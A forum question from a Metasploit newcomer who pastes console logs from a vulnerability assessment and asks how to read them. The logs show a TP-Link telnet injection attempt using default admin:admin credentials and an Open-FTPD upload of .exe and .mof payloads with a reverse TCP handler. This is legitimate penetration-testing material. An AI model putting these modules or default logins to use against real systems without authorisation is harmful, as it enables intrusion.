Knowledge Base

Ask A Question

Questions

0

Metasploit's Exploit results

Hello, I'm new to Metasploit - I tried the Metasploit Pro (free trial) and the msfconsole in kali. Just wanted to ask or get clarification on certain exploitation results that metasploit has provided on my test target. For the exploit I just uploaded the vulnerabilities identified by Nessus in Metasploit. After that, I runned the default exploit in Metasploit. Here are a few details of the results: 1*. [+] [2017.12.27-10:28:35] Workspace:MHC 2017 VAPT - JMF Progress:710/2310 (30%) [706/2305] xxx.xx.xx.x:80 - TP-Link SC2020n Authenticated Telnet Injection [*] [2017.12.27-10:28:36] [0706] xxxxx:80 - Exploiting [*] [2017.12.27-10:28:36] [0706] xxxxxx:80 - Trying to login with admin : admin [+] [2017.12.27-10:28:36] [0706] xxxxx:80 - Successful login admin : admin [*] [2017.12.27-10:28:36] [0706] xxxxxx:80 - Telnet Port: 62116 [*] [2017.12.27-10:28:36] [0706] xxxxxx:80 - Trying to establish telnet connection... [-] [2017.12.27-10:28:36] [0706] xxxxxx:80 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (xxxxx:62116). TP-Link SC2020n Authenticated Telnet Injection https://www.rapid7.com/db/modules/exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection *So for this exploit my concerns are: a. Port 80 is open per nmap scan, but Nessus did not flag it as vulnerable, so why was it exploited by Metasploit? b. I tried to login remotely to the target IP - but was not able to gain access using the credentials used by Metasploit to gain access (admin:admin) - I put it as username: admin and pw admin. Why was I not able to login? c. What could I have done to successfully exploit the target? 2**[+] [2017.12.27-10:10:07] Workspace:MHC 2017 VAPT - JMF Progress:38/2310 (1%) [34/2305] xxxxxxx:21 - Open-FTPD 1.2 Arbitrary File Upload [*] [2017.12.27-10:10:08] [0034] Started reverse TCP handler on 0.0.0.0:1040 [*] [2017.12.27-10:10:09] [0034] xxxx:21 - Server started. [*] [2017.12.27-10:10:10] [0034] xxxxx:21 - Trying to upload ndJDXciFuXF.exe [*] [2017.12.27-10:10:10] [0034] xxxxxx:21 - Connecting to FTP server xxxxxx:21... [*] [2017.12.27-10:10:10] [0034] xxxxxxx:21 - Connected to target FTP server. [*] [2017.12.27-10:10:10] [0034] xxxxxx:21 - Set binary mode [*] [2017.12.27-10:10:10] [0034] xxxxxxxxx:21 - Set active mode "10,111,28,37,4,17" [+] [2017.12.27-10:10:10] [0034] xxxxxxx:21 - Upload successful [*] [2017.12.27-10:10:12] [0034] xxxxxxxxx:21 - Trying to upload AQaAFAtyoj.mof [*] [2017.12.27-10:10:12] [0034] xxxxxx:21 - Connecting to FTP server xxxxxxx:21... [*] [2017.12.27-10:10:12] [0034] xxxxxxxxxx:21 - Connected to target FTP server. [*] [2017.12.27-10:10:12] [0034] xxxxxxxxxx:21 - Set binary mode [*] [2017.12.27-10:10:12] [0034] xxxxxxxx:21 - Set active mode "10,111,28,37,4,17" [+] [2017.12.27-10:10:12] [0034] xxxxxxxx:21 - Upload successful Open-FTPD 1.2 Arbitrary File Upload https://www.rapid7.com/db/modules/exploit/windows/ftp/open_ftpd_wbem **same as the first one, this was not flagged by Nessus. So my concerns here are: a. The upload was successful, but when we checked the server for the said files, it was not there (full search of server). Why was that? Am I looking in wrongly? what could be the reason the file was not there? Will highly appreciate your comments on this or provide me tips or correct me as to how should I interpret the results. Thank you, Sam

Posted by Sameer Anwar about a year ago